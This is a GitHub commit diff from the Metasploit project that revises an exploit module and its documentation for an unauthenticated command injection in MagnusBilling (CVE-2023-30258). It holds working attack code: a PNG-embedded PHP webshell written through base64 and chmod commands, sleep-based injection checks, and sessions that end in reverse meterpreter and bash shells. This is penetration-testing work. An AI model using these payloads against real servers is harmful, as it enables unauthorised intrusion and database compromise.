second release module with php fix

rapid7 · Oct 31, 2023 · bfff35e · bfff35e
1 parent 5c89df6
commit bfff35e
Show file tree

Hide file tree

Showing 2 changed files with 20 additions and 24 deletions.
diff --git a/...mentation/modules/exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258.md b/...mentation/modules/exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258.md
@@ -55,10 +55,10 @@ if (isset($_GET['democ'])) {
 - [x] `exploit`
 
 you should get a `shell` or `Meterpreter` session.
-```ShellSession
+```shell
 msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > info
 
-       Name: Magnusbilling application unauthenticated Remote Command Execution.
+       Name: MagnusBilling application unauthenticated Remote Command Execution.
      Module: exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258
    Platform: PHP, Unix, Linux
        Arch: php, cmd, x64, x86
@@ -124,7 +124,7 @@ Basic options:
 Payload information:
 
 Description:
-  A Command Injection vulnerability in magnusbilling application 6.x and 7.x allows
+  A Command Injection vulnerability in MagnusBilling application 6.x and 7.x allows
   remote attackers to run arbitrary commands via unauthenticated HTTP request.
   A piece of demonstration code is present in `lib/icepay/icepay.php`, with a call to an exec().
   The parameter to exec() includes the GET parameter `democ`, which is controlled by the user and
@@ -133,9 +133,9 @@ Description:
   The commands run with the privileges of the web server process, typically `www-data`.
   At a minimum, this allows an attacker to compromise the billing system and its database.
 
-  The following magnusbilling applications are vulnerable:
-  - Magnusbilling application version 6 (all versions);
-  - Magnusbilling application up to version 7.x and including commit 7af21ed620;
+  The following MagnusBilling applications are vulnerable:
+  - MagnusBilling application version 6 (all versions);
+  - MagnusBilling application up to version 7.x and including commit 7af21ed620;
 
 References:
   https://nvd.nist.gov/vuln/detail/CVE-2023-30258
@@ -156,7 +156,7 @@ to bypass any security settings on the Web and PHP server.
 
 ## Scenarios
 ###  MagnusBilling 7 on Debian 12.2 - PHP with payload php/meterpreter/reverse_tcp
-```ShellSession
+```shell
 msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > set rhosts 192.168.201.34
 rhosts => 192.168.201.34
 msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > exploit
@@ -181,7 +181,7 @@ Meterpreter : php/linux
 meterpreter >
 ```
 ###  MagnusBilling 7 on Debian 12.2 - Unix Command with payload cmd/unix/reverse_bash
-```ShellSession
+```shell
 msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > set target 1
 target => 1
 msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > exploit
@@ -203,7 +203,7 @@ pwd
 /var/www/html/mbilling/lib/icepay
 ```
 ###  MagnusBilling 7 on Debian 12.2 - Linux Dropper with payload linux/x64/meterpreter/reverse_tcp
-```ShellSession
+```shell
 msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > set target 2
 target => 2
 msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > exploit

diff --git a/modules/exploits/linux/http/magnusbilling_unauth_rce_cve_2023_30258.rb b/modules/exploits/linux/http/magnusbilling_unauth_rce_cve_2023_30258.rb
@@ -18,9 +18,9 @@ def initialize(info = {})
     super(
       update_info(
         info,
-        'Name' => 'Magnusbilling application unauthenticated Remote Command Execution.',
+        'Name' => 'MagnusBilling application unauthenticated Remote Command Execution.',
         'Description' => %q{
-          A Command Injection vulnerability in magnusbilling application 6.x and 7.x allows
+          A Command Injection vulnerability in MagnusBilling application 6.x and 7.x allows
           remote attackers to run arbitrary commands via unauthenticated HTTP request.
           A piece of demonstration code is present in `lib/icepay/icepay.php`, with a call to an exec().
           The parameter to exec() includes the GET parameter `democ`, which is controlled by the user and
@@ -29,9 +29,9 @@ def initialize(info = {})
           The commands run with the privileges of the web server process, typically `www-data`.
           At a minimum, this allows an attacker to compromise the billing system and its database.
 
-          The following magnusbilling applications are vulnerable:
-          - Magnusbilling application version 6 (all versions);
-          - Magnusbilling application up to version 7.x and including commit 7af21ed620;
+          The following MagnusBilling applications are vulnerable:
+          - MagnusBilling application version 6 (all versions);
+          - MagnusBilling application up to version 7.x and including commit 7af21ed620;
         },
         'License' => MSF_LICENSE,
         'Author' => [
@@ -52,7 +52,7 @@ def initialize(info = {})
           [
             'PHP',
             {
-              'Platform' => 'php',
+              'Platform' => ['php'],
               'Arch' => ARCH_PHP,
               'Type' => :php,
               'DefaultOptions' => {
@@ -63,7 +63,7 @@ def initialize(info = {})
           [
             'Unix Command',
             {
-              'Platform' => 'unix',
+              'Platform' => ['unix', 'linux'],
               'Arch' => ARCH_CMD,
               'Type' => :unix_cmd,
               'DefaultOptions' => {
@@ -74,7 +74,7 @@ def initialize(info = {})
           [
             'Linux Dropper',
             {
-              'Platform' => 'linux',
+              'Platform' => ['linux'],
               'Arch' => [ARCH_X64, ARCH_X86],
               'Type' => :linux_dropper,
               'CmdStagerFlavor' => ['wget', 'curl', 'bourne', 'printf', 'echo'],
@@ -86,10 +86,6 @@ def initialize(info = {})
           ]
         ],
         'DefaultTarget' => 0,
-        'DefaultOptions' => {
-          'RPORT' => 80,
-          'SSL' => false
-        },
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],
@@ -143,9 +139,9 @@ def upload_webshell
     png_webshell = inject_php_payload_png(php_payload, injection_method: 'PLTE')
     return nil if png_webshell.nil?
 
-    # encode webshell data and write to file on the target for execution
+    # encode webshell data, set write and execute permissions and write to file on the target for execution
     payload = Base64.strict_encode64(png_webshell.to_s)
-    cmd = "echo #{payload}|base64 -d > ./#{@webshell_name}"
+    cmd = "chmod 755 ./;echo #{payload}|base64 -d > ./#{@webshell_name}"
     execute_command(cmd)
   end
 
@@ -161,7 +157,7 @@ def check
     return CheckCode::Safe('Likely not a magnusbilling application.') unless res.code == 200 && res.body =~ /MagnusBilling/i
 
     # blind command injection using sleep command
-    sleep_time = rand(2..6)
+    sleep_time = rand(4..8)
     print_status("Performing command injection test issuing a sleep command of #{sleep_time} seconds.")
     _res, elapsed_time = Rex::Stopwatch.elapsed_time do
       execute_command("sleep #{sleep_time}")